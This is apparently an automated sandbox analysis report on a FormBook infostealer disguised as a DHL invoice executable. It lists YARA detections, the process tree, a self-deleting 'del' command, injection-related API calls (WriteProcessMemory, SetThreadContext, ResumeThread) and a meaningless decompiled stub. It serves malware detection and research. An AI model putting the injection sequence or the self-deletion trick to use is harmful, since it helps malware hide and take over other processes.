                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:high

                  Chronological Activities

                  Analysis Process: msdt.exe PID: 7056 Parent PID: 3440

                  General

                  Start time:18:58:00
                  Start date:02/12/2021
                  Path:C:\Windows\SysWOW64\msdt.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\msdt.exe
                  Imagebase:0xb30000
                  File size:1508352 bytes
                  MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:moderate

                  Chronological Activities

                  Analysis Process: cmd.exe PID: 7092 Parent PID: 7056

                  General

                  Start time:18:58:04
                  Start date:02/12/2021
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:/c del "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe"
                  Imagebase:0x2a0000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Chronological Activities

                  Analysis Process: conhost.exe PID: 7108 Parent PID: 7092

                  General

                  Start time:18:58:06
                  Start date:02/12/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff61de10000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Chronological Activities

                  Disassembly

                  Code Analysis

                  Reset < >

                    Analysis Process: invoice dhl.delivery document and original invoice sign.exe PID: 3452 Parent PID: 6056 invoice dhl.delivery document and original invoice sign.exeCOMMON

                    Executed Functions

                    Function 05CA7058, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                    Download Yara Rule
                    APIs
                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05CA728E
                    Memory Dump Source
                    • Source File: 00000000.00000002.367090363.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: a31b8a7b0318d182396a6b3c9698bb798a97fa1671b1c34773c92a11c782d644
                    • Instruction ID: 2543967a0896568ffeb0ab285e10ae90619977149a16e749c4f2d7b66405ce4b
                    • Opcode Fuzzy Hash: a31b8a7b0318d182396a6b3c9698bb798a97fa1671b1c34773c92a11c782d644
                    • Instruction Fuzzy Hash: 9A913C71D0021A9FDB10CFA4C841BEEBBF2FF48318F158969D959A7240DB749A85CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00E296D0, Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00E29916
                    Memory Dump Source
                    • Source File: 00000000.00000002.362730649.0000000000E20000.00000040.00000001.sdmp, Offset: 00E20000, based on PE: false
                    Similarity
                    • API ID: HandleModule
                    • String ID:
                    • API String ID: 4139908857-0
                    • Opcode ID: cf9eee75f5bd8d7f088a832a16b37d005887aa5652dc1747c42c9159866c3ad5
                    • Instruction ID: edfe5a441c70f6270f39c96fc7e4431c60accf6c1716016b88789d234c17340f
                    • Opcode Fuzzy Hash: cf9eee75f5bd8d7f088a832a16b37d005887aa5652dc1747c42c9159866c3ad5
                    • Instruction Fuzzy Hash: 1E714570A10B158FDB24DF6AE44579AB7F5FF88304F00992EE48AE7A41D735E805CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00E25345, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                    Download Yara Rule
                    APIs
                    • CreateActCtxA.KERNEL32(?), ref: 00E25401
                    Memory Dump Source
                    • Source File: 00000000.00000002.362730649.0000000000E20000.00000040.00000001.sdmp, Offset: 00E20000, based on PE: false
                    Similarity
                    • API ID: Create
                    • String ID:
                    • API String ID: 2289755597-0
                    • Opcode ID: 5ec147f359b09be6ab7c998b2cb2f85ba364d0fa0d36d662611171e525db4716
                    • Instruction ID: c8e69928142167e5b9de8b32dd8b3be8d41e1d59d2817e824dc36222082c1bf2
                    • Opcode Fuzzy Hash: 5ec147f359b09be6ab7c998b2cb2f85ba364d0fa0d36d662611171e525db4716
                    • Instruction Fuzzy Hash: 774102B1C00619CEDB24DFA9D844BCDBBB5BF88308F20846AD419BB250DB716985CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00E238A8, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                    Download Yara Rule
                    APIs
                    • CreateActCtxA.KERNEL32(?), ref: 00E25401
                    Memory Dump Source
                    • Source File: 00000000.00000002.362730649.0000000000E20000.00000040.00000001.sdmp, Offset: 00E20000, based on PE: false
                    Similarity
                    • API ID: Create
                    • String ID:
                    • API String ID: 2289755597-0
                    • Opcode ID: 9888f8a8951a3ba6b2a8edab8ab9de71b61d1678a49607a44fb165c68deae96b
                    • Instruction ID: df8750f681dd4270fa8580eace57f1ad3bc2795a680bd7b68b1f556aebe9a9a7
                    • Opcode Fuzzy Hash: 9888f8a8951a3ba6b2a8edab8ab9de71b61d1678a49607a44fb165c68deae96b
                    • Instruction Fuzzy Hash: C4410271C00618CFDB24DFA9D844BDDBBB5BF48308F208469D419BB251DB716985CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 05CA6DD0, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                    Download Yara Rule
                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05CA6E60
                    Memory Dump Source
                    • Source File: 00000000.00000002.367090363.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: 4387d029ae6bbb207a916362f8d277dbf872002d9499ee971e54a60d98860822
                    • Instruction ID: 5287bae141c2ff6a13d349d16fe30018d98f7e250e474ffce2820debe7bf127f
                    • Opcode Fuzzy Hash: 4387d029ae6bbb207a916362f8d277dbf872002d9499ee971e54a60d98860822
                    • Instruction Fuzzy Hash: FB213575D003099FCF10CFA9C880BEEBBF5BB48324F148829E919A7240D7789950CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00E2ADDC, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                    Download Yara Rule
                    APIs
                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00E2BBB6,?,?,?,?,?), ref: 00E2BC77
                    Memory Dump Source
                    • Source File: 00000000.00000002.362730649.0000000000E20000.00000040.00000001.sdmp, Offset: 00E20000, based on PE: false
                    Similarity
                    • API ID: DuplicateHandle
                    • String ID:
                    • API String ID: 3793708945-0
                    • Opcode ID: 9e3a4db854325ff5c37386affc0b02cc83ab04734b96e1bdc642bf58f4a5e70f
                    • Instruction ID: d9f116032aecc91779cff689a6f916c4ddf99759bad252083c562d58d6242551
                    • Opcode Fuzzy Hash: 9e3a4db854325ff5c37386affc0b02cc83ab04734b96e1bdc642bf58f4a5e70f
                    • Instruction Fuzzy Hash: 5A21E3B5900218AFDB10CF9AD985AEEFBF8EB48324F14841AE914B3310D774A954CFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00E2BBE9, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                    Download Yara Rule
                    APIs
                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00E2BBB6,?,?,?,?,?), ref: 00E2BC77
                    Memory Dump Source
                    • Source File: 00000000.00000002.362730649.0000000000E20000.00000040.00000001.sdmp, Offset: 00E20000, based on PE: false
                    Similarity
                    • API ID: DuplicateHandle
                    • String ID:
                    • API String ID: 3793708945-0
                    • Opcode ID: 8e7caf28c271ccd588c473e739fdaeea34a4f393c5f032524ec4f727ebe4e5c3
                    • Instruction ID: f2c54ec089d0b0949fbe05031711cb659946df9e86f644b6f540ec8a0fae257e
                    • Opcode Fuzzy Hash: 8e7caf28c271ccd588c473e739fdaeea34a4f393c5f032524ec4f727ebe4e5c3
                    • Instruction Fuzzy Hash: 2121E0B5D002589FDB10CFAAD985AEEFBF8EB48324F14842AE954B3350C774A954CF60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 05CA6EC0, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                    Download Yara Rule
                    APIs
                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05CA6F40
                    Memory Dump Source
                    • Source File: 00000000.00000002.367090363.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                    Similarity
                    • API ID: MemoryProcessRead
                    • String ID:
                    • API String ID: 1726664587-0
                    • Opcode ID: bf1bbf62e4a713f08ac5dfe598140491c3ebed5632b7cc1cfdf5dde008ca9e69
                    • Instruction ID: 655f94d52d6dd798b5f4e056c4f864db9325446c9f487f48e7e9544dc0d7023a
                    • Opcode Fuzzy Hash: bf1bbf62e4a713f08ac5dfe598140491c3ebed5632b7cc1cfdf5dde008ca9e69
                    • Instruction Fuzzy Hash: 7A2116B5C003499FCB10DFAAC884AEEBBF5FF48324F548829E519A7240D7389954CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 05CA6C38, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                    Download Yara Rule
                    APIs
                    • SetThreadContext.KERNELBASE(?,00000000), ref: 05CA6CB6
                    Memory Dump Source
                    • Source File: 00000000.00000002.367090363.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                    Similarity
                    • API ID: ContextThread
                    • String ID:
                    • API String ID: 1591575202-0
                    • Opcode ID: c6f3df0a80515339a0d9d63ef09675abb31fea7fdbbe99cc0dbce0e7829fc6e2
                    • Instruction ID: e6e1be2a9b51e9f83a7b83dd9ec86d5a0b38e0bb8f8e28595985f22f0e9bdf36
                    • Opcode Fuzzy Hash: c6f3df0a80515339a0d9d63ef09675abb31fea7fdbbe99cc0dbce0e7829fc6e2
                    • Instruction Fuzzy Hash: F9211871D003098FDB10DFAAC4857EEBBF5EF48228F548829D519A7340DB78A945CFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 05CA7EAC, Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON
                    Download Yara Rule
                    APIs
                    • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E28,?,?,05CA94D8,038740CC,02890178), ref: 05CA9569
                    Memory Dump Source
                    • Source File: 00000000.00000002.367090363.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                    Similarity
                    • API ID: EnumThreadWindows
                    • String ID:
                    • API String ID: 2941952884-0
                    • Opcode ID: e99e5b8df6776d080aa94bc581b803ba9c4cafadf13ad7d82e54ffa31ac4bc01
                    • Instruction ID: 312f1ed28fed9752b7a64fd5c4a879fc24abe9d9df8a3e277ced8e00b3f5f71e
                    • Opcode Fuzzy Hash: e99e5b8df6776d080aa94bc581b803ba9c4cafadf13ad7d82e54ffa31ac4bc01
                    • Instruction Fuzzy Hash: 6C2118719042098FDB10CF9AC885BEEFBF9EB88324F14882AD515A7340D774A945CFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 05CA99E8, Relevance: 1.6, APIs: 1, Instructions: 57windowCOMMON
                    Download Yara Rule
                    APIs
                    • MessageBoxW.USER32(?,00000000,00000000,?), ref: 05CA9A65
                    Memory Dump Source
                    • Source File: 00000000.00000002.367090363.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                    Similarity
                    • API ID: Message
                    • String ID:
                    • API String ID: 2030045667-0
                    • Opcode ID: 29232fc746e87d92ec02eead2ef23dcbef561f641d4de3017e9717582024ba08
                    • Instruction ID: b13d3f772d741a53a1250017de52b1b8059371893f1d37900499229df39036b0
                    • Opcode Fuzzy Hash: 29232fc746e87d92ec02eead2ef23dcbef561f641d4de3017e9717582024ba08
                    • Instruction Fuzzy Hash: 832113B6C003099FCB10CF9AC885ADEFBB5FB88314F54892ED419A7200C374A944CFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00E29168, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E29991,00000800,00000000,00000000), ref: 00E29BA2
                    Memory Dump Source
                    • Source File: 00000000.00000002.362730649.0000000000E20000.00000040.00000001.sdmp, Offset: 00E20000, based on PE: false
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: d7991679f826dc2a00f576ee36a0ed2048c0067a461dee6792e61d3067b5d603
                    • Instruction ID: 0a0ee0209fc41fd4f145157fa00b5e228085e96d65549a56ede3b44ad6af0f52
                    • Opcode Fuzzy Hash: d7991679f826dc2a00f576ee36a0ed2048c0067a461dee6792e61d3067b5d603
                    • Instruction Fuzzy Hash: DD1114B69002199FDB10CF9AE444ADEFBF8EB88324F14842AE915B7300C775A945CFA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00E29B30, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E29991,00000800,00000000,00000000), ref: 00E29BA2
                    Memory Dump Source
                    • Source File: 00000000.00000002.362730649.0000000000E20000.00000040.00000001.sdmp, Offset: 00E20000, based on PE: false
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: a193f695b25d915234c330fd4b756ccc81ca18c7f20ba0bf9437a5da01f498c0
                    • Instruction ID: 43a829de18df4ce7fcecbd798a0ccda44a19854937609a91cb6bbe1b9d2aeb27
                    • Opcode Fuzzy Hash: a193f695b25d915234c330fd4b756ccc81ca18c7f20ba0bf9437a5da01f498c0
                    • Instruction Fuzzy Hash: 6B1114B68003098FCB10CF9AD444BDEFBF8AB88324F14852AE915B7200C379A555CFA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 05CA6D10, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05CA6D7E
                    Memory Dump Source
                    • Source File: 00000000.00000002.367090363.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: a6002c7689f577a5df7698e1efb6f8996dd89bd3c4dbb44ba7ed63585e75caaf
                    • Instruction ID: bb129181985ac6af008b3300617c9d5749c027c8679da6ead71906197ac2f09a
                    • Opcode Fuzzy Hash: a6002c7689f577a5df7698e1efb6f8996dd89bd3c4dbb44ba7ed63585e75caaf
                    • Instruction Fuzzy Hash: CE112972D002499FCF10DFA9C8446EFBBF9AB48324F148819D515A7250C7799550CFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 05CA8E88, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                    Download Yara Rule
                    APIs
                    • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,05CAC461,?,?), ref: 05CAC608
                    Memory Dump Source
                    • Source File: 00000000.00000002.367090363.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                    Similarity
                    • API ID: ChangeCloseFindNotification
                    • String ID:
                    • API String ID: 2591292051-0
                    • Opcode ID: 6ca250dacc696147946677ee69e99022402cb2388812b659f8e3e544366a56ae
                    • Instruction ID: f1cd551e630c854efc6741aba9ad7810de6f62ac00a6a79666cd191b5d058d75
                    • Opcode Fuzzy Hash: 6ca250dacc696147946677ee69e99022402cb2388812b659f8e3e544366a56ae
                    • Instruction Fuzzy Hash: 98113AB58007098FCB10DF99C4457DEBBF4EB88324F148829E915B7341D738A954CFA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 05CA6B88, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.367090363.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: bf1dc06c396198091e360f213bcba853834cfce7f1cac09cec2c89c924b5eaee
                    • Instruction ID: 33ea1e336aa9034fb026f28308f4d2331bd3d60862ea74806c0a1360c8ce65b2
                    • Opcode Fuzzy Hash: bf1dc06c396198091e360f213bcba853834cfce7f1cac09cec2c89c924b5eaee
                    • Instruction Fuzzy Hash: CE110AB5D003498FDB10DFAAC8457EFFBF9AB88228F248829D515A7240D775A944CFA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00E298B0, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00E29916
                    Memory Dump Source
                    • Source File: 00000000.00000002.362730649.0000000000E20000.00000040.00000001.sdmp, Offset: 00E20000, based on PE: false
                    Similarity
                    • API ID: HandleModule
                    • String ID:
                    • API String ID: 4139908857-0
                    • Opcode ID: 2273397eaa8847f5748e0c9e53c1e0c66fedb7ab7998b51765c211d645cfa527
                    • Instruction ID: cfebffaf874d521eaca6133776f57a4087e22dae01cfca0cb630dae941279795
                    • Opcode Fuzzy Hash: 2273397eaa8847f5748e0c9e53c1e0c66fedb7ab7998b51765c211d645cfa527
                    • Instruction Fuzzy Hash: AF110FB5C002498FCB10CF9AD844ADEFBF8EB89324F14842AD429B7600C374A545CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 05CA7EA0, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                    Download Yara Rule
                    APIs
                    • OleInitialize.OLE32(00000000), ref: 05CA901D
                    Memory Dump Source
                    • Source File: 00000000.00000002.367090363.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: 7ef31ecc53f049c23310dcff21d46144bb9b5e6b002a9b6f24c7abbf175341fc
                    • Instruction ID: 20e4f755bc0a1ab2e5fe33ff307dec0b81d65283b54883cdab80380348f58414
                    • Opcode Fuzzy Hash: 7ef31ecc53f049c23310dcff21d46144bb9b5e6b002a9b6f24c7abbf175341fc
                    • Instruction Fuzzy Hash: 751133B58003498FCB20DF9AD4857DEBBF8EB48328F208819E519B3300C374A944CFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 05CA9D90, Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                    Download Yara Rule
                    APIs
                    • PostMessageW.USER32(?,?,?,?), ref: 05CA9DED
                    Memory Dump Source
                    • Source File: 00000000.00000002.367090363.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                    Similarity
                    • API ID: MessagePost
                    • String ID:
                    • API String ID: 410705778-0
                    • Opcode ID: 512ff1b3df4fc55cf231c5d397d198179c0576cc25c4144934fc41affb88ab0f
                    • Instruction ID: a766446411b18cef074334ddff6776e14a868c4ff7197ce01ba72d0c794c8b71
                    • Opcode Fuzzy Hash: 512ff1b3df4fc55cf231c5d397d198179c0576cc25c4144934fc41affb88ab0f
                    • Instruction Fuzzy Hash: B711D0B58003499FDB10DF9AD885BDEBBF8EB48324F14881AE515A7600C375AA94CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 004E2855, Relevance: 1.2, Instructions: 1245COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 85%
                    			E004E2855(signed int __eax, signed int* __ebx, signed int __ecx, signed int __edx, void* __edi, signed int __esi) {
				signed int _t177;
				signed char _t179;
				signed char _t180;
				signed char _t181;
				signed char _t331;
				signed char _t332;
				signed int _t334;
				signed int* _t337;
				void* _t338;
				void* _t422;
				signed int _t428;
				void* _t431;

				_t422 = __edi;
				_t398 = __edx;
				_t361 = __ecx;
				_t337 = __ebx;
				_t175 = __eax;
				_t428 = __esi ^ __eax;
				 *__ebx =  *__ebx | __edx;
				 *__ecx =  *__ecx | __edx;
				 *__edx =  *__edx | __ecx;
				 *__eax =  *__eax + __eax;
				 *__ebx =  *__ebx + __edx;
				 *__ebx =  *__ebx ^ __eax;
				 *__eax =  *__eax + __edx;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __edx;
				 *__eax =  *__eax + __eax;
				asm("adc [edx], eax");
				if( *__eax != 0) {
					L3:
					_t177 = (_t175 |  *_t428) -  *(_t175 |  *_t428);
					 *_t177 =  *_t177 + _t177;
					asm("adc esi, [eax]");
					 *_t177 =  *_t177 + _t177;
					 *_t177 =  *_t177 | _t177;
					 *_t177 =  *_t177 + _t177;
					asm("adc [eax], eax");
					 *_t361 =  *_t361 + _t398;
					_t337 = _t337 + _t337[7];
					 *_t177 =  *_t177 + _t177;
					_push(es);
					_t179 = _t177 + 0xa -  *((intOrPtr*)(_t177 + 0xa));
				} else {
					 *__eax =  *__eax + __eax;
					_t179 = __eax + 0x2b;
					_pop(ss);
					 *_t179 =  *_t179 + _t179;
					_t361 = __ecx |  *__edx;
					_push(es);
					_t398 = __edx -  *__ebx;
					 *_t361 =  *_t361 ^ _t179;
					 *_t361 =  *_t361 + _t361;
					 *_t179 =  *_t179 + _t179;
					 *_t361 =  *_t361 + _t179;
					 *_t179 =  *_t179 + _t179;
					asm("adc [edx], eax");
					if( *_t179 == 0) {
						 *_t179 =  *_t179 + _t179;
						_t175 = _t179 + 0xa;
						goto L3;
					}
				}
				 *_t179 =  *_t179 + _t179;
				 *_t428 = _t337 +  *_t428;
				_t180 = _t179 +  *_t337;
				if(_t180 < 0) {
					 *_t180 =  *_t180 + _t180;
					_t334 = _t180 + 0x7f;
					 *_t334 =  *_t334 & _t334;
					 *((intOrPtr*)(_t398 + _t431)) =  *((intOrPtr*)(_t398 + _t431)) + _t334;
					asm("adc esi, [eax]");
					 *_t334 =  *_t334 + _t334;
					 *_t334 =  *_t334 | _t334;
					 *_t334 =  *_t334 + _t334;
					 *_t334 =  *_t334 + _t334;
					 *_t361 =  *_t361 + _t398;
					_t337 = _t337 + _t337[8];
					 *_t334 =  *_t334 + _t334;
					_push(es);
					_t180 = _t334 + 0xa -  *((intOrPtr*)(_t334 + 0xa));
				}
				 *_t180 =  *_t180 + _t180;
				 *_t337 =  *_t337 + _t398;
				 *_t361 =  *_t361 ^ _t180;
				 *_t361 =  *_t361 + _t361;
				 *_t180 =  *_t180 + _t180;
				 *_t361 =  *_t361 + _t180;
				 *_t180 =  *_t180 + _t180;
				asm("adc [edx], eax");
				if( *_t180 == 0) {
					 *_t180 =  *_t180 + _t180;
					_push(es);
					_t331 = _t180 + 0xa -  *((intOrPtr*)(_t180 + 0xa));
					 *_t331 =  *_t331 + _t331;
					 *_t337 =  *_t337 - _t361;
					 *_t331 =  *_t331 + _t331;
					_t332 = _t331 |  *_t398;
					_t422 = _t422 +  *((intOrPtr*)(_t431 + 0x22));
					 *_t332 =  *_t332 + _t332;
					_t180 = _t332 + 0x2a;
					 *_t337 =  *_t337 + _t398;
					 *_t398 =  *_t398 ^ _t180;
					 *_t337 =  *_t337 + _t361;
					 *_t180 =  *_t180 + _t180;
					 *_t398 =  *_t398 + _t361;
				}
				_t181 = _t180 |  *_t180;
				 *_t361 =  *_t361 + _t398;
				_t338 = _t337 + _t337[8];
			}















                    0x004e2855
                    0x004e2855
                    0x004e2855
                    0x004e2855
                    0x004e2855
                    0x004e2855
                    0x004e2857
                    0x004e2859
                    0x004e285b
                    0x004e285d
                    0x004e285f
                    0x004e2861
                    0x004e2863
                    0x004e2865
                    0x004e2867
                    0x004e2869
                    0x004e286b
                    0x004e286d
                    0x004e288e
                    0x004e2890
                    0x004e2892
                    0x004e2894
                    0x004e2896
                    0x004e2898
                    0x004e289a
                    0x004e289c
                    0x004e289e
                    0x004e28a0
                    0x004e28a3
                    0x004e28a7
                    0x004e28a8
                    0x004e286f
                    0x004e286f
                    0x004e2873
                    0x004e2875
                    0x004e2876
                    0x004e2878
                    0x004e287a
                    0x004e287b
                    0x004e287d
                    0x004e287f
                    0x004e2881
                    0x004e2883
                    0x004e2885
                    0x004e2887
                    0x004e2889
                    0x004e288b
                    0x004e288d
                    0x00000000
                    0x004e288d
                    0x004e2889
                    0x004e28a9
                    0x004e28ab
                    0x004e28ad
                    0x004e28af
                    0x004e28b1
                    0x004e28b5
                    0x004e28b7
                    0x004e28b9
                    0x004e28bc
                    0x004e28be
                    0x004e28c0
                    0x004e28c2
                    0x004e28c4
                    0x004e28c6
                    0x004e28c8
                    0x004e28cb
                    0x004e28cf
                    0x004e28d0
                    0x004e28d0
                    0x004e28d1
                    0x004e28d3
                    0x004e28d5
                    0x004e28d7
                    0x004e28d9
                    0x004e28db
                    0x004e28dd
                    0x004e28df
                    0x004e28e1
                    0x004e28e3
                    0x004e28e7
                    0x004e28e8
                    0x004e28ea
                    0x004e28ee
                    0x004e28f0
                    0x004e28f2
                    0x004e28f4
                    0x004e28f7
                    0x004e28f9
                    0x004e28fb
                    0x004e28fd
                    0x004e28ff
                    0x004e2901
                    0x004e2903
                    0x004e2903
                    0x004e2904
                    0x004e2906
                    0x004e2908

                    Memory Dump Source
                    • Source File: 00000000.00000002.361815167.00000000004E2000.00000002.00020000.sdmp, Offset: 004E0000, based on PE: true
                    • Associated: 00000000.00000002.361804169.00000000004E0000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7161d09a3bdb791401b33f3fcf750a4a94351d79dd6b82abdab7c9f9dba1552e
                    • Instruction ID: 9c723452877666a3b4b4a580fdc880b2efbf04cb8651acd43aed4fdea31f3378
                    • Opcode Fuzzy Hash: 7161d09a3bdb791401b33f3fcf750a4a94351d79dd6b82abdab7c9f9dba1552e
                    • Instruction Fuzzy Hash: 4AA2116240E3C29FCB138B749DB51D1BFB1AE5722472E09CBC4C0CF0A7E258599AD766
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00E2E8B8, Relevance: .3, Instructions: 315COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.362730649.0000000000E20000.00000040.00000001.sdmp, Offset: 00E20000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 977b348c0db772e428a628f73a003cd367361c801b80a5c8f74095677a1412fc
                    • Instruction ID: c7fc6ccbb5b4135f887175becf4f6396167f6cc90d226129c0ae50fedbfad849
                    • Opcode Fuzzy Hash: 977b348c0db772e428a628f73a003cd367361c801b80a5c8f74095677a1412fc
                    • Instruction Fuzzy Hash: BD1280BA411F468FE310CF66EC981893BA1F786328B914708D2613AAF2D7B4114FEF45
